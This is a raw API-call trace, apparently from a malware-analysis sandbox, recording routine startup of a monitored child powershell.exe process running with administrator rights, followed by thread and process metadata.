	[0933.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0934.389] CoTaskMemAlloc (cb=0x104) returned 0x4c5800
	[0934.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.389] CoTaskMemFree (pv=0x4c5800) 
	[0934.390] CoTaskMemAlloc (cb=0x104) returned 0x4c5800
	[0934.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.390] CoTaskMemFree (pv=0x4c5800) 
	[0935.302] CoTaskMemAlloc (cb=0x104) returned 0x4c5800
	[0935.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.302] CoTaskMemFree (pv=0x4c5800) 
	[0935.303] CoTaskMemAlloc (cb=0x104) returned 0x4c5800
	[0935.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.303] CoTaskMemFree (pv=0x4c5800) 
	[0935.303] CoTaskMemAlloc (cb=0x104) returned 0x4c5800
	[0935.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.303] CoTaskMemFree (pv=0x4c5800) 
	[0936.381] CoTaskMemAlloc (cb=0x104) returned 0x4c5800
	[0936.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0936.382] CoTaskMemFree (pv=0x4c5800) 
	[0936.385] CoTaskMemAlloc (cb=0x104) returned 0x4c5800
	[0936.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0936.385] CoTaskMemFree (pv=0x4c5800) 
	[0936.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0936.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0939.632] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0939.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0939.632] CoTaskMemFree (pv=0x4c5a20) 
	[0939.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0939.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0939.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0939.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0939.798] SetErrorMode (uMode=0x1) returned 0x1
	[0939.798] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24db20 | out: lpFileInformation=0x24db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0939.798] SetErrorMode (uMode=0x1) returned 0x1
	[0964.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.653] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0964.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.653] CoTaskMemFree (pv=0x4c5a20) 
	[0964.656] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0964.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.656] CoTaskMemFree (pv=0x4c5a20) 
	[0964.656] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0964.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.656] CoTaskMemFree (pv=0x4c5a20) 
	[0964.659] CoCreateGuid (in: pguid=0x24dee8 | out: pguid=0x24dee8*(Data1=0x9873856b, Data2=0x60c1, Data3=0x4415, Data4=([0]=0x99, [1]=0x58, [2]=0x36, [3]=0xe3, [4]=0xe2, [5]=0xdb, [6]=0xf5, [7]=0x7f))) returned 0x0
	[0964.662] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0964.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.662] CoTaskMemFree (pv=0x4c5a20) 
	[0964.665] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0964.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.665] CoTaskMemFree (pv=0x4c5a20) 
	[0964.668] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0964.668] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.668] CoTaskMemFree (pv=0x4c5a20) 
	[0964.688] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0965.063] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24db90 | out: lpConsoleScreenBufferInfo=0x24db90) returned 1
	[0965.079] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0965.080] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24db90 | out: lpConsoleScreenBufferInfo=0x24db90) returned 1
	[0965.081] GetVersionExW (in: lpVersionInformation=0x24db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0965.084] GetCurrentProcess () returned 0xffffffffffffffff
	[0965.085] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24dbb8 | out: TokenHandle=0x24dbb8*=0x30c) returned 1
	[0965.089] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dad8 | out: TokenInformation=0x0, ReturnLength=0x24dad8) returned 0
	[0965.090] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x487280
	[0965.090] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x487280, TokenInformationLength=0x4, ReturnLength=0x24dad8 | out: TokenInformation=0x487280, ReturnLength=0x24dad8) returned 1
	[0965.090] DuplicateTokenEx (in: hExistingToken=0x30c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24dc38 | out: phNewToken=0x24dc38*=0x2d0) returned 1
	[0965.090] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24dad8 | out: TokenInformation=0x0, ReturnLength=0x24dad8) returned 0
	[0965.091] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x4872b0, TokenInformationLength=0x4, ReturnLength=0x24dad8 | out: TokenInformation=0x4872b0, ReturnLength=0x24dad8) returned 1
	[0965.091] CheckTokenMembership (in: TokenHandle=0x2d0, SidToCheck=0x2efdd80*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24dc48 | out: IsMember=0x24dc48) returned 1
	[0965.091] CloseHandle (hObject=0x2d0) returned 1
	[0965.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.385] CoTaskMemAlloc (cb=0x804) returned 0x2087aa0
	[0965.385] GetConsoleTitleW (in: lpConsoleTitle=0x2087aa0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0965.385] CoTaskMemFree (pv=0x2087aa0) 
	[0965.411] CoTaskMemAlloc (cb=0x804) returned 0x2088350
	[0965.411] GetConsoleTitleW (in: lpConsoleTitle=0x2088350, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0965.411] CoTaskMemFree (pv=0x2088350) 
	[0965.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.414] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0965.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.714] SetConsoleCtrlHandler (HandlerRoutine=0x2be68dc, Add=1) returned 1
	[0966.015] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0966.017] CoCreateGuid (in: pguid=0x24dd30 | out: pguid=0x24dd30*(Data1=0xa2752026, Data2=0xa26a, Data3=0x44ab, Data4=([0]=0x94, [1]=0x8d, [2]=0x76, [3]=0x13, [4]=0x36, [5]=0x2c, [6]=0xbb, [7]=0x8d))) returned 0x0
	[0966.018] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0966.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.018] CoTaskMemFree (pv=0x4c5a20) 
	[0966.515] WinSqmIsOptedIn () returned 0x0
	[0966.515] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0966.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.515] CoTaskMemFree (pv=0x4c5a20) 
	[0966.516] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0966.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.516] CoTaskMemFree (pv=0x4c5a20) 
	[0967.589] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0967.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.589] CoTaskMemFree (pv=0x4c5a20) 
	[0967.590] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0967.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.590] CoTaskMemFree (pv=0x4c5a20) 
	[0967.590] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0967.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.590] CoTaskMemFree (pv=0x4c5a20) 
	[0968.871] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0968.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.871] CoTaskMemFree (pv=0x4c5a20) 
	[0968.872] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0968.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.872] CoTaskMemFree (pv=0x4c5a20) 
	[0968.873] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0968.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.873] CoTaskMemFree (pv=0x4c5a20) 
	[0968.882] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0968.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.882] CoTaskMemFree (pv=0x4c5a20) 
	[0970.044] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0970.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.044] CoTaskMemFree (pv=0x4c5a20) 
	[0970.047] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0970.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.047] CoTaskMemFree (pv=0x4c5a20) 
	[0970.047] CoTaskMemAlloc (cb=0x104) returned 0x4c5a20
	[0970.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4c5a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.047] CoTaskMemFree (pv=0x4c5a20) 

Thread:
	id = 853
	os_tid = 0x172c


Thread:
	id = 867
	os_tid = 0x13ec


Thread:
	id = 1473
	os_tid = 0x1d88


Thread:
	id = 1478
	os_tid = 0x1eb8


Thread:
	id = 1535
	os_tid = 0x202c


Thread:
	id = 1637
	os_tid = 0x21e0


Thread:
	id = 1655
	os_tid = 0x229c

	[0829.523] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 1671
	os_tid = 0x230c


Thread:
	id = 2099
	os_tid = 0x1698


Process:
	id = "142"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4e2df000"
	os_pid = "0x1668"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "38"
	os_parent_pid = "0xc20"
